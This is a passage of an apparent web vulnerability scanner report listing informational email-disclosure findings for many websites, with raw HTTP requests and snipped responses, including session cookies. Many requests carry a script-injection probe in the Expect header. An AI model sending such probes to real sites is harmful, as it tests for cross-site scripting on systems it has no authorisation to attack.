GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.girlfriendsecret.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Mon, 02 May 2011 00:33:30 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://www.livejasmin.com/listpage.php?psid=bronetwork&pstour=t1&psprogram=REVS&pstool=30_1
Content-Length: 411

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.livejasmin.com/listpage.php?psid=bronet
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

27.20. http://www.google.com/uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js

Issue detail

The following email address was disclosed in the response:

Request

GET /uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 200 OK
Expires: Wed, 25 Apr 2012 00:23:32 GMT
Date: Tue, 26 Apr 2011 00:23:32 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=31536000
Age: 524498
Content-Length: 202049

(function() {
/**
* SWFObject v1.4.2: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http:
...[SNIP]...
tion.datautils.compareValues",mk); })();

/**
* Copyright 2007 Google Inc. All Rights Reserved
*
* @fileoverview Tiny compatibility file for third party swfobject-1.5.js
*
* @author Doug Ricket (dricket@google.com)
*/

// These global variables are undefined in swfobject-1.5.js
var __flash_unloadHandler;
var __flash_savedUnloadHandler;

/**
* @license SWFObject v1.5: Flash Player detection and embed -
* http
...[SNIP]...

27.21. http://www.headsets.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.headsets.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.headsets.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:42:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 499
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webserver@headsets.com">
...[SNIP]...

27.22. http://www.herematures.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herematures.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herematures.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Sun, 01 May 2011 23:02:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8844
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:02:29 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Matures Pictures</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20herematures.com">
...[SNIP]...

27.23. http://www.heresquirt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heresquirt.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heresquirt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Sun, 01 May 2011 23:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8750
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Sun, 01 May 2011 23:48:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Squirt Pictures</title>
<!--
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20heresquirt.com">
...[SNIP]...

27.24. http://www.herestuds.tv/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herestuds.tv
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herestuds.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8762
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:13:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Studs Movies</title>
<!-- SR
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20herestuds.tv">
...[SNIP]...

27.25. http://www.hlsm.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlsm.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.hlsm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://www.hlsm.com/main.htm
Date: Mon, 02 May 2011 03:10:46 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 16:31:12 GMT
ETag: "1066e5a78f4cb1:dc0"
Content-Length: 35204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0021)http://www.hlsm1.com/ -->
<HTML><HEAD><TITLE>OnlineMicrofiche Index</TITLE>
<META http-equiv=Content-Type co
...[SNIP]...
<a href="mailto:epfsales@hlsm.com">
...[SNIP]...
<a href="Mailto:info@xtremepowersports.com%20">info@xtremepowersports.com
</a>
...[SNIP]...

27.26. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
<a href="mailto:Support@HotWheelsCollectors.com" class="redlink">Support@HotWheelsCollectors.com</a>
...[SNIP]...
<a class="footer" href="mailto:comments@hotwheelscollectors.com">comments@hotwheelscollectors.com</a>
...[SNIP]...

27.27. http://www.jacksonnewspapers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jacksonnewspapers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Sun, 01 May 2011 23:16:26 GMT
Content-Type: text/html
Content-Length: 1400
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 cache6.ghm.zope.net:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

27.28. http://www.japanator.com/elephant/login.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The following email address was disclosed in the response:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<a href="mailto:tips@japanator.com" style="color:#ffffff;">tips@japanator.com</a>
...[SNIP]...

27.29. http://www.japanator.com/elephant/signup.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The following email address was disclosed in the response:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<a href="mailto:tips@japanator.com" style="color:#ffffff;">tips@japanator.com</a>
...[SNIP]...

27.30. http://www.links4vids.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.links4vids.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.links4vids.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:17:53 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

27.31. http://www.lsitools.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lsitools.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lsitools.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: 1BC
X-Powered-By: ASP.NET
Content-Length: 2821
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASDCTAC=FIGHIEJCAKIFODBPPKNPODEM; path=/
Cache-control: private

<html>
<head>
   <title>LSI Tools | Expert solutions for the vacation rental industry.</title>
   <meta NAME="keywords" CONTENT="Expert Solutions for the Vacation Rental Industry">
   <meta NAME="descri
...[SNIP]...
<A HREF="mailto:info@LSITools.com">Info@LSITools.com</A>
...[SNIP]...

27.32. http://www.marrow.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marrow.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.marrow.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:21:02 GMT
Server: Apache
Content-Type: text/html
Content-Length: 11064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>

<title>NMDP - File Not Found</title>
<meta name="description" content="
...[SNIP]...
<A href="mailto:webmaster@nmdp.org">webmaster@nmdp.org</A>
...[SNIP]...

27.33. http://www.mashastube.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mashastube.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mashastube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:42:31 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Content-Length: 529
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@advancedhosters.com">
...[SNIP]...

27.34. http://www.momvictress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.momvictress.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.momvictress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:45:19 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 501

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

27.35. http://www.mylovedpee.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedpee.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedpee.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:10:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8707
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:10:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Pee Pictures</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedpee.com">
...[SNIP]...

27.36. http://www.mylovedspy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedspy.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedspy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:51:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8666
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:51:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Spy Pictures</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedspy.com">
...[SNIP]...

27.37. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Top.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /xtremepowersports/shoppingcart/CheckOut/Top.htm HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:26:58 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 28 May 2009 18:29:21 GMT
ETag: "4ce86638c2dfc91:dd2"
Content-Length: 2762

<html>
<head>
<title>Xtreme Powersports' OEM Parts Finder Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" leftmarg
...[SNIP]...
<a href="mailto:info@xtremepowersports.com"><b><font face="Arial, Helvetica, sans-serif" size="2">info@xtremepowersports.com</font>
...[SNIP]...

27.38. http://www.questcomp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questcomp.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.questcomp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

27.39. http://www.rtvchannel.tv/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rtvchannel.tv
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rtvchannel.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:46:55 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 512
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:info@rtvchannel.tv">
...[SNIP]...

27.40. http://www.sadocabin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sadocabin.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sadocabin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:30:50 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 326

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

27.41. http://www.sassieshop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sassieshop.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sassieshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:25:10 GMT
Server: Apache
Content-Length: 504
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:support@surfmerchants.com">
...[SNIP]...

27.42. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_footer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_footer.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-adv/jobs4/javascript/jobs_footer.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
